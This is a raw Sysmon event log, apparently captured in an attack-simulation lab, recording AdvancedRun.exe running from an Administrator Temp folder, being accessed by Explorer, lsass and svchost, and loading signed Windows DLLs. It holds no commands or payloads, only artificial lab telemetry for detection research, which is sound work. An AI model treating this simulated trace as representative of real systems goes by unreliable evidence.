20:09:26.467{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.467{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.463{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.462{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.462{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.461{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.423{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.423{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004068069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.226{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.220{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.999{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.997{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.996{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.996{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.992{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004068062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.990{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.990{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.983{834264DD-DAE4-61EA-0C00-000000002702}6523980C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.970{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.965{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.965{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.964{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.963{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.963{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.962{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.962{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.961{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.961{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.960{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.960{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.960{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.958{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.958{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.957{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 